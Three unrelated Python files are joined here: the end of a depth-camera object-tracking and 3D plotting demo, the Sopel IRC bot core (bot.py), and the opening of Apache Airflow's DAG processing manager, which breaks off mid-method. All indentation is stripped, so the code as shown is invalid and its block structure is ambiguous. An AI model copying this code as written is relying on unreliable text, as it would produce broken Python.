for old in tracked_objects:
if old.label != new_obj.label: continue
# ignore depth difference in clustering
loc_old = local_pos(old.position)
loc_new = local_pos(new_obj.position)
z = max([MIN_DEPTH, loc_old[2], loc_new[2]])
dist = np.linalg.norm((loc_old - loc_new)[:2]) / z
if dist < best_dist:
best_dist = dist
best = old
# if best: print(f'matched with {best} (seen {best.n_detections} time(s))')
return best
def track(t, detections, view_mat):
SCALE = 0.001 # output is millimeters
MIN_DETECTIONS = 8
DETECTION_WINDOW = 1.0
MAX_UNSEEN_AGE = 8.0
w_to_c_mat = np.linalg.inv(view_mat)
for d in detections:
p_local = np.array([
d.spatialCoordinates.x * SCALE,
-d.spatialCoordinates.y * SCALE, # note: flipped y
d.spatialCoordinates.z * SCALE,
1
])
p_world = (view_mat @ p_local)[:3]
try:
label = LABEL_MAP[d.label]
except:
label = d.label
# simple O(n^2)
for o in tracked_objects:
if o.label != label: continue
dist = np.linalg.norm(o.position - p_world)
if label in SELECTED_LABELS:
new_obj = TrackedObject(t, p_world, label)
existing = find_best_match(new_obj, w_to_c_mat)
if existing:
existing.update(new_obj)
else:
tracked_objects.append(new_obj)
def should_remove(o):
if o.n_detections < MIN_DETECTIONS and o.last_seen < t - DETECTION_WINDOW: return True
if o.last_seen < t - MAX_UNSEEN_AGE: return True
return False
# remove cruft
i = 0
while i < len(tracked_objects):
if should_remove(tracked_objects[i]):
# print(f'removing ${o}')
del tracked_objects[i]
else:
i += 1
# print(tracked_objects)
return [o for o in tracked_objects if o.n_detections >= MIN_DETECTIONS]
return track
# Tiny yolo v3/4 label texts
LABEL_MAP = [
"person", "bicycle", "car", "motorbike", "aeroplane", "bus", "train",
"truck", "boat", "traffic light", "fire hydrant", "stop sign", "parking meter", "bench",
"bird", "cat", "dog", "horse", "sheep", "cow", "elephant",
"bear", "zebra", "giraffe", "backpack", "umbrella", "handbag", "tie",
"suitcase", "frisbee", "skis", "snowboard", "sports ball", "kite", "baseball bat",
"baseball glove", "skateboard", "surfboard", "tennis racket", "bottle", "wine glass", "cup",
"fork", "knife", "spoon", "bowl", "banana", "apple", "sandwich",
"orange", "broccoli", "carrot", "hot dog", "pizza", "donut", "cake",
"chair", "sofa", "pottedplant", "bed", "diningtable", "toilet", "tvmonitor",
"laptop", "mouse", "remote", "keyboard", "cell phone", "microwave", "oven",
"toaster", "sink", "refrigerator", "book", "clock", "vase", "scissors",
"teddy bear", "hair drier", "toothbrush"
]
SELECTED_LABELS = ['mouse', 'cup', 'dog']
def make_camera_wireframe(aspect=640/400., scale=0.05):
# camera "frustum"
corners = [[-1, -1], [1, -1], [1, 1], [-1, 1], [-1, -1]]
cam_wire = []
for x, y in corners:
cam_wire.append([x*aspect, y, 1])
for x, y in corners:
cam_wire.append([x*aspect, y, 1])
cam_wire.append([0, 0, 0])
return (scale * np.array(cam_wire)).tolist()
class MatplotlibVisualization:
"""
Interactive / real-time 3D line & point visualization using Matplotlib.
This is quite far from the comfort zone of MPL and not very extensible.
"""
def __init__(self):
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.animation import FuncAnimation
fig = plt.figure()
ax = Axes3D(fig, auto_add_to_figure=False)
fig.add_axes(ax)
ax_bounds = (-0.5, 0.5) # meters
ax.set(xlim=ax_bounds, ylim=ax_bounds, zlim=ax_bounds)
ax.view_init(azim=-140) # initial plot orientation
empty_xyz = lambda: { c: [] for c in 'xyz' }
vio_data = empty_xyz()
vio_data['plot'] = ax.plot(
xs=[], ys=[], zs=[],
linestyle="-",
marker="",
label='VIO trajectory'
)
vio_cam_data = empty_xyz()
vio_cam_data['plot'] = ax.plot(
xs=[], ys=[], zs=[],
linestyle="-",
marker="",
label='current cam pose'
)
detection_data = empty_xyz()
detection_data['labels'] = []
detection_data['plot'] = ax.plot(
xs=[], ys=[], zs=[],
linestyle="",
marker="o",
label=' or '.join(SELECTED_LABELS)
)
ax.legend()
ax.set_xlabel("x (m)")
ax.set_ylabel("y (m)")
ax.set_zlabel("z (m)")
#title = ax.set_title("Spatial AI demo")
def on_close(*args):
self.should_close = True
fig.canvas.mpl_connect('close_event', on_close)
self.cam_wire = make_camera_wireframe()
self.vio_data = vio_data
self.vio_cam_data = vio_cam_data
self.detection_data = detection_data
self.should_close = False
def update_graph(*args):
r = []
for graph in [self.vio_data, self.vio_cam_data, self.detection_data]:
p = graph['plot'][0]
x, y, z = [np.array(graph[c]) for c in 'xyz']
p.set_data(x, y)
p.set_3d_properties(z)
r.append(p)
return tuple(r)
self._anim = FuncAnimation(fig, update_graph, interval=15, blit=True)
def update_vio(self, vio_out):
if self.should_close: return False
view_mat = vio_out.pose.asMatrix()
for c in 'xyz': self.vio_cam_data[c] = []
for vertex in self.cam_wire:
p_local = np.array(vertex + [1])
p_world = (view_mat @ p_local)[:3]
for i, c in enumerate('xyz'):
self.vio_cam_data[c].append(p_world[i])
for c in 'xyz':
self.vio_data[c].append(getattr(vio_out.pose.position, c))
return True
def update_detected_objects(self, tracked_objects):
if self.should_close: return False
for i in range(3):
self.detection_data['xyz'[i]] = np.array([o.position[i] for o in tracked_objects])
self.detection_data['labels'] = [o.label for o in tracked_objects]
return True
def start_in_parallel_with(self, parallel_thing):
thread = threading.Thread(target = parallel_thing)
thread.start()
plt.show()
thread.join()
def draw_detections_on_rgb_frame(frame, detections, fps):
# If the frame is available, draw bounding boxes on it and show the frame
height = frame.shape[0]
width = frame.shape[1]
for detection in detections:
# Denormalize bounding box
x1 = int(detection.xmin * width)
x2 = int(detection.xmax * width)
y1 = int(detection.ymin * height)
y2 = int(detection.ymax * height)
try:
label = LABEL_MAP[detection.label]
except:
label = detection.label
if label in SELECTED_LABELS:
color = (0, 255, 0)
cv2.putText(frame, str(label), (x1 + 10, y1 + 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, "{:.2f}".format(detection.confidence*100), (x1 + 10, y1 + 35), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"X: {int(detection.spatialCoordinates.x)} mm", (x1 + 10, y1 + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"Y: {int(detection.spatialCoordinates.y)} mm", (x1 + 10, y1 + 65), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
cv2.putText(frame, f"Z: {int(detection.spatialCoordinates.z)} mm", (x1 + 10, y1 + 80), cv2.FONT_HERSHEY_TRIPLEX, 0.5, 255)
else:
color = (255, 0, 0)
cv2.rectangle(frame, (x1, y1), (x2, y2), color, cv2.FONT_HERSHEY_SIMPLEX)
color = (255, 255, 255)
cv2.putText(frame, "NN fps: {:.2f}".format(fps), (2, frame.shape[0] - 4), cv2.FONT_HERSHEY_TRIPLEX, 0.4, color)
if __name__ == '__main__':
nnBlobPath = 'models/yolo-v4-tiny-tf_openvino_2021.4_6shave.blob'
if len(sys.argv) > 1:
nnBlobPath = sys.argv[1]
if not Path(nnBlobPath).exists():
raise FileNotFoundError(f'Could not find {nnBlobPath}"')
showRgb = True
pipeline, vio_pipeline = make_pipelines(nnBlobPath, showRgb)
with dai.Device(pipeline) as device:
visu_3d = MatplotlibVisualization()
def main_loop():
startTime = time.monotonic()
counter = 0
fps = 0
color = (255, 255, 255)
vio_session = vio_pipeline.startSession(device)
tracker = make_tracker()
if showRgb: previewQueue = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
detectionNNQueue = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
xoutBoundingBoxDepthMappingQueue = device.getOutputQueue(name="boundingBoxDepthMapping", maxSize=4, blocking=False)
vio_matrix = None
while True:
if vio_session.hasOutput():
vio_out = vio_session.getOutput()
vio_matrix = vio_out.pose.asMatrix()
if not visu_3d.update_vio(vio_out): break
elif detectionNNQueue.has():
if showRgb:
inPreview = previewQueue.get()
frame = inPreview.getCvFrame()
inDet = detectionNNQueue.get()
# TODO: depth hook
#depthFrame = depth.getFrame()
#depthFrameColor = cv2.normalize(depthFrame, None, 255, 0, cv2.NORM_INF, cv2.CV_8UC1)
#depthFrameColor = cv2.equalizeHist(depthFrameColor)
#depthFrameColor = cv2.applyColorMap(depthFrameColor, cv2.COLORMAP_HOT)
counter+=1
current_time = time.monotonic()
if (current_time - startTime) > 1 :
fps = counter / (current_time - startTime)
counter = 0
startTime = current_time
detections = inDet.detections
if len(detections) != 0:
boundingBoxMapping = xoutBoundingBoxDepthMappingQueue.get()
roiDatas = boundingBoxMapping.getConfigData()
if vio_matrix is not None:
detections_world = tracker(current_time, detections, vio_matrix)
visu_3d.update_detected_objects(detections_world)
if showRgb:
draw_detections_on_rgb_frame(frame, detections, fps)
cv2.imshow("rgb", frame)
if cv2.waitKey(1) == ord('q'):
break
else:
time.sleep(0.005)
vio_session.close()
visu_3d.start_in_parallel_with(main_loop)
|
bot.py
|
# coding=utf-8
# Copyright 2008, Sean B. Palmer, inamidst.com
# Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
# Copyright 2012-2015, Elsie Powell, http://embolalia.com
#
# Licensed under the Eiffel Forum License 2.
from __future__ import unicode_literals, absolute_import, print_function, division
import collections
import os
import re
import sys
import threading
import time
from sopel import tools
from sopel import irc
from sopel.db import SopelDB
from sopel.tools import stderr, Identifier
import sopel.tools.jobs
from sopel.trigger import Trigger
from sopel.module import NOLIMIT
from sopel.logger import get_logger
import sopel.loader
LOGGER = get_logger(__name__)
if sys.version_info.major >= 3:
unicode = str
basestring = str
py3 = True
else:
py3 = False
class _CapReq(object):
def __init__(self, prefix, module, failure=None, arg=None, success=None):
def nop(bot, cap):
pass
# TODO at some point, reorder those args to be sane
self.prefix = prefix
self.module = module
self.arg = arg
self.failure = failure or nop
self.success = success or nop
class Sopel(irc.Bot):
def __init__(self, config, daemon=False):
irc.Bot.__init__(self, config)
self._daemon = daemon # Used for iPython. TODO something saner here
# `re.compile('.*') is re.compile('.*')` because of caching, so we need
# to associate a list with each regex, since they are unexpectedly
# indistinct.
self._callables = {
'high': collections.defaultdict(list),
'medium': collections.defaultdict(list),
'low': collections.defaultdict(list)
}
self.config = config
"""The :class:`sopel.config.Config` for the current Sopel instance."""
self.doc = {}
"""
A dictionary of command names to their docstring and example, if
declared. The first item in a callable's commands list is used as the
key in version *3.2* onward. Prior to *3.2*, the name of the function
as declared in the source code was used.
"""
self._command_groups = collections.defaultdict(list)
"""A mapping of module names to a list of commands in it."""
self.stats = {} # deprecated, remove in 7.0
self._times = {}
"""
A dictionary mapping lower-case'd nicks to dictionaries which map
funtion names to the time which they were last used by that nick.
"""
self.server_capabilities = {}
"""A dict mapping supported IRCv3 capabilities to their options.
For example, if the server specifies the capability ``sasl=EXTERNAL``,
it will be here as ``{"sasl": "EXTERNAL"}``. Capabilities specified
without any options will have ``None`` as the value.
For servers that do not support IRCv3, this will be an empty set."""
self.enabled_capabilities = set()
"""A set containing the IRCv3 capabilities that the bot has enabled."""
self._cap_reqs = dict()
"""A dictionary of capability names to a list of requests"""
self.privileges = dict()
"""A dictionary of channels to their users and privilege levels
The value associated with each channel is a dictionary of
:class:`sopel.tools.Identifier`\\s to
a bitwise integer value, determined by combining the appropriate
constants from :mod:`sopel.module`.
.. deprecated:: 6.2.0
Use :attr:`channels` instead.
"""
self.channels = tools.SopelMemory() # name to chan obj
"""A map of the channels that Sopel is in.
The keys are Identifiers of the channel names, and map to
:class:`sopel.tools.target.Channel` objects which contain the users in
the channel and their permissions.
"""
self.users = tools.SopelMemory() # name to user obj
"""A map of the users that Sopel is aware of.
The keys are Identifiers of the nicknames, and map to
:class:`sopel.tools.target.User` instances. In order for Sopel to be
aware of a user, it must be in at least one channel which they are also
in.
"""
self.db = SopelDB(config)
"""The bot's database, as a :class:`sopel.db.SopelDB` instance."""
self.memory = tools.SopelMemory()
"""
A thread-safe dict for storage of runtime data to be shared between
modules. See :class:`sopel.tools.Sopel.SopelMemory`
"""
self.shutdown_methods = []
"""List of methods to call on shutdown"""
self.scheduler = sopel.tools.jobs.JobScheduler(self)
self.scheduler.start()
# Set up block lists
# Default to empty
if not self.config.core.nick_blocks:
self.config.core.nick_blocks = []
if not self.config.core.host_blocks:
self.config.core.host_blocks = []
self.setup()
# Backwards-compatibility aliases to attributes made private in 6.2. Remove
# these in 7.0
times = property(lambda self: getattr(self, '_times'))
command_groups = property(lambda self: getattr(self, '_command_groups'))
def write(self, args, text=None): # Shim this in here for autodocs
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceeded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``sopel.write(('PRIVMSG',), 'Hello, world!')``
and ``sopel.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
than 510 characters, any remaining characters will not be sent.
"""
irc.Bot.write(self, args, text=text)
def setup(self):
stderr("\nWelcome to Sopel. Loading modules...\n\n")
modules = sopel.loader.enumerate_modules(self.config)
error_count = 0
success_count = 0
for name in modules:
path, type_ = modules[name]
try:
module, _ = sopel.loader.load_module(name, path, type_)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(filename, os.path.dirname(__file__))
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error loading %s: %s (%s)" % (name, e, raising_stmt))
else:
try:
if hasattr(module, 'setup'):
module.setup(self)
relevant_parts = sopel.loader.clean_module(
module, self.config)
except Exception as e:
error_count = error_count + 1
filename, lineno = tools.get_raising_file_and_line()
rel_path = os.path.relpath(
filename, os.path.dirname(__file__)
)
raising_stmt = "%s:%d" % (rel_path, lineno)
stderr("Error in %s setup procedure: %s (%s)"
% (name, e, raising_stmt))
else:
self.register(*relevant_parts)
success_count += 1
if len(modules) > 1: # coretasks is counted
stderr('\n\nRegistered %d modules,' % (success_count - 1))
stderr('%d modules failed to load\n\n' % error_count)
else:
stderr("Warning: Couldn't load any modules")
def unregister(self, obj):
if not callable(obj):
return
if hasattr(obj, 'rule'): # commands and intents have it added
for rule in obj.rule:
callb_list = self._callables[obj.priority][rule]
if obj in callb_list:
callb_list.remove(obj)
if hasattr(obj, 'interval'):
# TODO this should somehow find the right job to remove, rather than
# clearing the entire queue. Issue #831
self.scheduler.clear_jobs()
if (getattr(obj, '__name__', None) == 'shutdown' and
obj in self.shutdown_methods):
self.shutdown_methods.remove(obj)
def register(self, callables, jobs, shutdowns, urls):
# Append module's shutdown function to the bot's list of functions to
# call on shutdown
self.shutdown_methods += shutdowns
for callbl in callables:
if hasattr(callbl, 'rule'):
for rule in callbl.rule:
self._callables[callbl.priority][rule].append(callbl)
else:
self._callables[callbl.priority][re.compile('.*')].append(callbl)
if hasattr(callbl, 'commands'):
module_name = callbl.__module__.rsplit('.', 1)[-1]
# TODO doc and make decorator for this. Not sure if this is how
# it should work yet, so not making it public for 6.0.
category = getattr(callbl, 'category', module_name)
self._command_groups[category].append(callbl.commands[0])
for command, docs in callbl._docs.items():
self.doc[command] = docs
for func in jobs:
for interval in func.interval:
job = sopel.tools.jobs.Job(interval, func)
self.scheduler.add_job(job)
if not self.memory.contains('url_callbacks'):
self.memory['url_callbacks'] = tools.SopelMemory()
for func in urls:
self.memory['url_callbacks'][func.url_regex] = func
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def msg(self, recipient, text, max_messages=1):
# Deprecated, but way too much of a pain to remove.
self.say(text, recipient, max_messages)
def say(self, text, recipient, max_messages=1):
"""Send ``text`` as a PRIVMSG to ``recipient``.
In the context of a triggered callable, the ``recipient`` defaults to
the channel (or nickname, if a private message) from which the message
was received.
By default, this will attempt to send the entire ``text`` in one
message. If the text is too long for the server, it may be truncated.
If ``max_messages`` is given, the ``text`` will be split into at most
that many messages, each no more than 400 bytes. The split is made at
the last space character before the 400th byte, or at the 400th byte if
no such space exists. If the ``text`` is too long to fit into the
specified number of messages using the above splitting, the final
message will contain the entire remainder, which may be truncated by
the server.
"""
# We're arbitrarily saying that the max is 400 bytes of text when
# messages will be split. Otherwise, we'd have to acocunt for the bot's
# hostmask, which is hard.
max_text_length = 400
# Encode to bytes, for propper length calculation
if isinstance(text, unicode):
encoded_text = text.encode('utf-8')
else:
encoded_text = text
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' '.encode('utf-8'), 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# We'll then send the excess at the end
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Identifier(recipient)
self.write(('PRIVMSG', recipient), text)
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, text, dest):
"""Send an IRC NOTICE to a user or a channel.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.write(('NOTICE', dest), text)
def action(self, text, dest):
"""Send ``text`` as a CTCP ACTION PRIVMSG to ``dest``.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``dest`` will default to
the channel (or nickname, if a private message), in which the trigger
happened.
"""
self.say('\001ACTION {}\001'.format(text), dest)
def reply(self, text, dest, reply_to, notice=False):
"""Prepend ``reply_to`` to ``text``, and send as a PRIVMSG to ``dest``.
If ``notice`` is ``True``, send a NOTICE rather than a PRIVMSG.
The same loop detection and length restrictions apply as with
:func:`say`, though automatic message splitting is not available.
Within the context of a triggered callable, ``reply_to`` will default to
the nickname of the user who triggered the call, and ``dest`` to the
channel (or nickname, if a private message), in which the trigger
happened.
"""
text = '%s: %s' % (reply_to, text)
if notice:
self.notice(text, dest)
else:
self.say(text, dest)
class SopelWrapper(object):
def __init__(self, sopel, trigger):
# The custom __setattr__ for this class sets the attribute on the
# original bot object. We don't want that for these, so we set them
# with the normal __setattr__.
object.__setattr__(self, '_bot', sopel)
object.__setattr__(self, '_trigger', trigger)
def __dir__(self):
classattrs = [attr for attr in self.__class__.__dict__
if not attr.startswith('__')]
return list(self.__dict__) + classattrs + dir(self._bot)
def __getattr__(self, attr):
return getattr(self._bot, attr)
def __setattr__(self, attr, value):
return setattr(self._bot, attr, value)
def say(self, message, destination=None, max_messages=1):
if destination is None:
destination = self._trigger.sender
self._bot.say(message, destination, max_messages)
def action(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.action(message, destination)
def notice(self, message, destination=None):
if destination is None:
destination = self._trigger.sender
self._bot.notice(message, destination)
def reply(self, message, destination=None, reply_to=None, notice=False):
if destination is None:
destination = self._trigger.sender
if reply_to is None:
reply_to = self._trigger.nick
self._bot.reply(message, destination, reply_to, notice)
def call(self, func, sopel, trigger):
nick = trigger.nick
current_time = time.time()
if nick not in self._times:
self._times[nick] = dict()
if self.nick not in self._times:
self._times[self.nick] = dict()
if not trigger.is_privmsg and trigger.sender not in self._times:
self._times[trigger.sender] = dict()
if not trigger.admin and not func.unblockable:
if func in self._times[nick]:
usertimediff = current_time - self._times[nick][func]
if func.rate > 0 and usertimediff < func.rate:
#self._times[nick][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to user limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, usertimediff,
func.rate
)
return
if func in self._times[self.nick]:
globaltimediff = current_time - self._times[self.nick][func]
if func.global_rate > 0 and globaltimediff < func.global_rate:
#self._times[self.nick][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to global limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, globaltimediff,
func.global_rate
)
return
if not trigger.is_privmsg and func in self._times[trigger.sender]:
chantimediff = current_time - self._times[trigger.sender][func]
if func.channel_rate > 0 and chantimediff < func.channel_rate:
#self._times[trigger.sender][func] = current_time
LOGGER.info(
"%s prevented from using %s in %s due to channel limit: %d < %d",
trigger.nick, func.__name__, trigger.sender, chantimediff,
func.channel_rate
)
return
try:
exit_code = func(sopel, trigger)
except Exception: # TODO: Be specific
exit_code = None
self.error(trigger)
if exit_code != NOLIMIT:
self._times[nick][func] = current_time
self._times[self.nick][func] = current_time
if not trigger.is_privmsg:
self._times[trigger.sender][func] = current_time
def dispatch(self, pretrigger):
args = pretrigger.args
event, args, text = pretrigger.event, args, args[-1] if args else ''
if self.config.core.nick_blocks or self.config.core.host_blocks:
nick_blocked = self._nick_blocked(pretrigger.nick)
host_blocked = self._host_blocked(pretrigger.host)
else:
nick_blocked = host_blocked = None
list_of_blocked_functions = []
for priority in ('high', 'medium', 'low'):
items = self._callables[priority].items()
for regexp, funcs in items:
match = regexp.match(text)
if not match:
continue
user_obj = self.users.get(pretrigger.nick)
account = user_obj.account if user_obj else None
trigger = Trigger(self.config, pretrigger, match, account)
wrapper = self.SopelWrapper(self, trigger)
for func in funcs:
if (not trigger.admin and
not func.unblockable and
(nick_blocked or host_blocked)):
function_name = "%s.%s" % (
func.__module__, func.__name__
)
list_of_blocked_functions.append(function_name)
continue
if event not in func.event:
continue
if hasattr(func, 'intents'):
if not trigger.tags.get('intent'):
continue
match = False
for intent in func.intents:
if intent.match(trigger.tags.get('intent')):
match = True
if not match:
continue
if func.thread:
targs = (func, wrapper, trigger)
t = threading.Thread(target=self.call, args=targs)
t.start()
else:
self.call(func, wrapper, trigger)
if list_of_blocked_functions:
if nick_blocked and host_blocked:
block_type = 'both'
elif nick_blocked:
block_type = 'nick'
else:
block_type = 'host'
LOGGER.info(
"[%s]%s prevented from using %s.",
block_type,
trigger.nick,
', '.join(list_of_blocked_functions)
)
def _host_blocked(self, host):
bad_masks = self.config.core.host_blocks
for bad_mask in bad_masks:
bad_mask = bad_mask.strip()
if not bad_mask:
continue
if (re.match(bad_mask + '$', host, re.IGNORECASE) or
bad_mask == host):
return True
return False
def _nick_blocked(self, nick):
bad_nicks = self.config.core.nick_blocks
for bad_nick in bad_nicks:
bad_nick = bad_nick.strip()
if not bad_nick:
continue
if (re.match(bad_nick + '$', nick, re.IGNORECASE) or
Identifier(bad_nick) == nick):
return True
return False
def _shutdown(self):
stderr(
'Calling shutdown for %d modules.' % (len(self.shutdown_methods),)
)
for shutdown_method in self.shutdown_methods:
try:
stderr(
"calling %s.%s" % (
shutdown_method.__module__, shutdown_method.__name__,
)
)
shutdown_method(self)
except Exception as e:
stderr(
"Error calling shutdown method for module %s:%s" % (
shutdown_method.__module__, e
)
)
def cap_req(self, module_name, capability, arg=None, failure_callback=None,
success_callback=None):
"""Tell Sopel to request a capability when it starts.
By prefixing the capability with `-`, it will be ensured that the
capability is not enabled. Simmilarly, by prefixing the capability with
`=`, it will be ensured that the capability is enabled. Requiring and
disabling is "first come, first served"; if one module requires a
capability, and another prohibits it, this function will raise an
exception in whichever module loads second. An exception will also be
raised if the module is being loaded after the bot has already started,
and the request would change the set of enabled capabilities.
If the capability is not prefixed, and no other module prohibits it, it
will be requested. Otherwise, it will not be requested. Since
capability requests that are not mandatory may be rejected by the
server, as well as by other modules, a module which makes such a
request should account for that possibility.
The actual capability request to the server is handled after the
completion of this function. In the event that the server denies a
request, the `failure_callback` function will be called, if provided.
The arguments will be a `Sopel` object, and the capability which was
rejected. This can be used to disable callables which rely on the
capability. It will be be called either if the server NAKs the request,
or if the server enabled it and later DELs it.
The `success_callback` function will be called upon acknowledgement of
the capability from the server, whether during the initial capability
negotiation, or later.
If ``arg`` is given, and does not exactly match what the server
provides or what other modules have requested for that capability, it is
considered a conflict.
"""
# TODO raise better exceptions
cap = capability[1:]
prefix = capability[0]
entry = self._cap_reqs.get(cap, [])
if any((ent.arg != arg for ent in entry)):
raise Exception('Capability conflict')
if prefix == '-':
if self.connection_registered and cap in self.enabled_capabilities:
raise Exception('Can not change capabilities after server '
'connection has been completed.')
if any((ent.prefix != '-' for ent in entry)):
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
else:
if prefix != '=':
cap = capability
prefix = ''
if self.connection_registered and (cap not in
self.enabled_capabilities):
raise Exception('Can not change capabilities after server '
'connection has been completed.')
# Non-mandatory will callback at the same time as if the server
# rejected it.
if any((ent.prefix == '-' for ent in entry)) and prefix == '=':
raise Exception('Capability conflict')
entry.append(_CapReq(prefix, module_name, failure_callback, arg,
success_callback))
self._cap_reqs[cap] = entry
|
manager.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import inspect
import logging
import multiprocessing
import os
import random
import signal
import sys
import time
from collections import defaultdict
from datetime import datetime, timedelta
from importlib import import_module
from multiprocessing.connection import Connection as MultiprocessingConnection
from typing import TYPE_CHECKING, Any, Dict, List, NamedTuple, Optional, Union, cast
from setproctitle import setproctitle
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag_processing.processor import DagFileProcessorProcess
from airflow.models import DagModel, errors
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_DAG_CODE
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.callback_requests import CallbackRequest, SlaCallbackRequest, TaskCallbackRequest
from airflow.utils.file import list_py_file_paths
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.net import get_hostname
from airflow.utils.process_utils import kill_child_processes_by_pids, reap_process_group
from airflow.utils.session import provide_session
from airflow.utils.state import State
if TYPE_CHECKING:
import pathlib
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: Optional[datetime]
last_duration: Optional[float]
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_RUN_ONCE = 'agent_run_once'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin, MultiprocessingStartMethodMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[str]
:param pickle_dags: whether to pickle DAGs.
:type: pickle_dags: bool
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(
self,
dag_directory: str,
max_runs: int,
processor_timeout: timedelta,
dag_ids: Optional[List[str]],
pickle_dags: bool,
async_mode: bool,
):
super().__init__()
self._file_path_queue: List[str] = []
self._dag_directory: str = dag_directory
self._max_runs = max_runs
self._processor_timeout = processor_timeout
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._async_mode = async_mode
# Map from file path to the processor
self._processors: Dict[str, DagFileProcessorProcess] = {}
# Pipe for communicating signals
self._process: Optional[multiprocessing.process.BaseProcess] = None
self._done: bool = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn: Optional[MultiprocessingConnection] = None
self._last_parsing_stat_received_at: float = time.monotonic()
def start(self) -> None:
"""Launch DagFileProcessorManager processor and start DAG parsing loop in manager."""
mp_start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(mp_start_method)
self._last_parsing_stat_received_at = time.monotonic()
self._parent_signal_conn, child_signal_conn = context.Pipe()
process = context.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_timeout,
child_signal_conn,
self._dag_ids,
self._pickle_dags,
self._async_mode,
),
)
self._process = process
process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", process.pid)
def run_single_parsing_loop(self) -> None:
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._parent_signal_conn or not self._process:
raise ValueError("Process not started.")
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_RUN_ONCE)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_serialized_dags calls _heartbeat_manager.
pass
def send_callback_to_execute(self, request: CallbackRequest) -> None:
"""
Sends information about the callback to be executed by DagFileProcessor.
:param request: Callback request to be executed.
:type request: CallbackRequest
"""
if not self._parent_signal_conn:
